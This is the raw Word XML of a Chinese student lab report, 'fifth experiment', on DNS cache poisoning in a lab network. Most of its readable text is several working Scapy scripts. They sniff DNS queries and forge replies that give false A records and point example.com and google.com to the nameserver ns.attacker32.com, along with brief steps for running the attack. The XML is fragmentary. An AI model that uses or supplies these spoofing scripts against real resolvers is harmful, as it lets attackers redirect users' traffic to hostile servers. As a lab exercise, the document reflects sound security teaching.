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第五次实验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57118216 丰思飏</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2990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378460"/>
            <wp:effectExtent l="0" t="0" r="1016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</w:rPr>
        <w:t>br-dba943523b71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82346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实验前测试，获得攻击者的IP地址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攻击前清理缓存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69230" cy="308038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运行以下程序进行攻击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NS_NAME = "example.com"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spoof_dns(pkt):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(DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode("utf-8")):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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))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= IP(dst=pkt[IP].src,src=pkt[IP].dst) # Create an IP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udp = UDP(dport=pkt[UDP].sport,sport=53) # Create a UPD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Anssec = DNSRR(rrname=pkt[DNS].qd.name,type='A',rdata='1.2.3.4',ttl=259200) # Create an aswer record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dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd,aa=1,rd=0,qdcount=1,qr=1,ancount=1,an=Anssec) # Create a DNS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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet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send(spoofpkt)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myFilter = "udp and (src host 10.9.0.5 and dst port 53)" # Set the filter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pkt=sniff(iface='br-dba943523b71',filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="29076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用以下程序进行攻击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NS_NAME = "example.com"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spoof_dns(pkt):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(DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode("utf-8")):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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))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= IP(dst=pkt[IP].src,src=pkt[IP].dst) # Create an IP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udp = UDP(dport=pkt[UDP].sport,sport=53) # Create a UPD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Anssec = DNSRR(rrname=pkt[DNS].qd.name,type='A',rdata='1.2.3.4',ttl=259200) # Create an aswer record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dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd,aa=1,rd=0,qdcount=1,qr=1,ancount=1,an=Anssec) # Create a DNS object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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet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send(spoofpkt)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myFilter = "udp and (src host 10.9.0.53 and dst port 53)" # Set the filter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pkt=sniff(iface='br-dba943523b71',filter=myFilter, prn=spoof_dns)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2405" cy="2185035"/>
            <wp:effectExtent l="0" t="0" r="1079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用以下程序进行攻击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NS_NAME = "example.com"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spoof_dns(pkt):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(DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode("utf-8")):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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))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 = IP(dst=pkt[IP].src,src=pkt[IP].dst) # Create an IP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 = UDP(dport=pkt[UDP].sport,sport=53) # Create a UPD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Anssec = DNSRR(rrname=pkt[DNS].qd.name,type='A',rdata='1.2.3.5',ttl=259200) # Create an aswer record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NSsec = DNSRR(rrname="example.com",type="NS",rdata="ns.attacker32.com",ttl=259200)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dns=DNS(id=pkt[DNS].id,qd=pkt[DNS].qd,aa=1,rd=0,qdcount=1,qr=1,ancount=1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nscount=1,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>an=Anssec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>,ns=NSsec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) # Create a DNS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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet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send(spoofpkt)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myFilter = "udp and (src host 10.9.0.53 and dst port 53)" # Set the filter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pkt=sniff(iface='br-dba943523b71',filter=myFilter, prn=spoof_dns)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2548255"/>
            <wp:effectExtent l="0" t="0" r="1079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用以下程序进行攻击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NS_NAME = "example.com"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spoof_dns(pkt):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(DNS in pkt and NS_NAME in pkt[DNS].qd.qname.decode("utf-8")):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print(pkt.sprintf("{DNS: %IP.src% --&gt; %IP.dst%: %DNS.id%}"))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 = IP(dst=pkt[IP].src,src=pkt[IP].dst) # Create an IP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udp = UDP(dport=pkt[UDP].sport,sport=53) # Create a UPD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Anssec = DNSRR(rrname=pkt[DNS].qd.name,type='A',rdata='1.2.3.5',ttl=259200) # Create an aswer record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NSsec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DNSRR(rrname="example.com",type="NS",rdata="ns.attacker32.com",ttl=259200)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NSsec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= DNSRR(rrname="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>.com",type="NS",rdata="ns.attacker32.com",ttl=259200)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dns = DNS(id=pkt[DNS].id, qd=pkt[DNS].qd,aa=1,rd=0,qdcount=1,qr=1,ancount=1,an=Anssec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，nscount=2,ns=NSsec1/NSsec2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>) # Create a DNS object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spoofpkt = ip/udp/dns # Assemble the spoofed DNS packet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send(spoofpkt)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myFilter = "udp and (src host 10.9.0.53 and dst port 53)" # Set the filter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pkt=sniff(iface='br-dba943523b71',filter=myFilter, prn=spoof_dns)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攻击后查看缓存，发现google.com不在缓存中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724A4"/>
    <w:rsid w:val="0BE822AE"/>
    <w:rsid w:val="0C7835EC"/>
    <w:rsid w:val="0EFA5208"/>
    <w:rsid w:val="18D21190"/>
    <w:rsid w:val="246B7A3F"/>
    <w:rsid w:val="2969466A"/>
    <w:rsid w:val="2AB91A9D"/>
    <w:rsid w:val="2BA6033F"/>
    <w:rsid w:val="2D8E1139"/>
    <w:rsid w:val="2DAF0195"/>
    <w:rsid w:val="2F07122B"/>
    <w:rsid w:val="2F4F1D72"/>
    <w:rsid w:val="312B16F2"/>
    <w:rsid w:val="3241115C"/>
    <w:rsid w:val="32CE1275"/>
    <w:rsid w:val="3993426B"/>
    <w:rsid w:val="3FAB0814"/>
    <w:rsid w:val="40EA5873"/>
    <w:rsid w:val="44875553"/>
    <w:rsid w:val="53B47CD4"/>
    <w:rsid w:val="58D26E85"/>
    <w:rsid w:val="660C5316"/>
    <w:rsid w:val="66E574EA"/>
    <w:rsid w:val="687A2129"/>
    <w:rsid w:val="6CD36B29"/>
    <w:rsid w:val="6DE46F87"/>
    <w:rsid w:val="7F2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2021-07-19T01:07:47Z</dcterms:created>
  <dc:creator>dell</dc:creator>
  <cp:lastModifiedBy>丰思飏</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-19T11:52:14Z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78DD7F2F9A4E48A185277416ABC48A85</vt:lpwstr>
  </property>
</Properties>
</file>